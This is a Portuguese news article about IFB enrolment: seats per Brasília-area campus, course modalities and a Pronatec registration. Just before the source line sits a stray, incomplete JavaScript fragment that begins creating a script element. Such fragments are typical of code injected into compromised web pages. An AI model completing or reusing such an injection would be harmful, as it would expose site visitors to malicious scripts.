IFB abre vagas para cursos técnicos e ensino médio integrado no DF

 

As vagas estão distribuídas em 10 campi do instituto no DF, localizados em Brasília(585),Ceilândia(80), Estrutural (80), Gama (150), Planaltina (240), Riacho Fundo(180), Samambaia (215), São Sebastião(224),Taguatinga(176) e Taguatinga Centro (80).

Uma das modalidades disponíveis é a do ensino médio integrado, que une cursos técnicos e o ensino médio do IFB. Podem concorrer pessoas que possuem o ensino fundamental completo. O curso tem duração média de três anos.

O instituto oferece também a modalidade integrado – proeja, destinada a pessoas com mais de 18 anos que já concluíram o ensino fundamental, mas não terminaram o ensino médio. A duração deste curso é de três anos, em média.

Na modalidade concomitante, o IFB oferece um curso técnico, aliado a realização de ensino médio em outra escola, direcionado àqueles que estão cursando o ensino médio e desejam fazer um curso técnico no instituo. Há também a modalidade subsequente, destinada para quem terminou o ensino médio – com um a dois anos de duração.

 

Pronatec
O IFB abre 515 vagas em cursos presenciais do Programa Nacional de Acesso ao Ensino Técnico e Emprego (Pronatec), a partir da próxima sexta-feira (21). As inscrições podem ser feitas no site do programa.

Depois de realizar a inscrição, o candidato deve ir ao campus ofertante com RG, CPF, comprovante de escolaridade e com o protocolo de inscrição nos dias e horários descritos. As vagas disponíveis estão distribuídas nos campi de Brasília (160), do Gama (155) e de Samambaia(200), para pessoas que possuem ensino fundamental completo ou incompleto.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário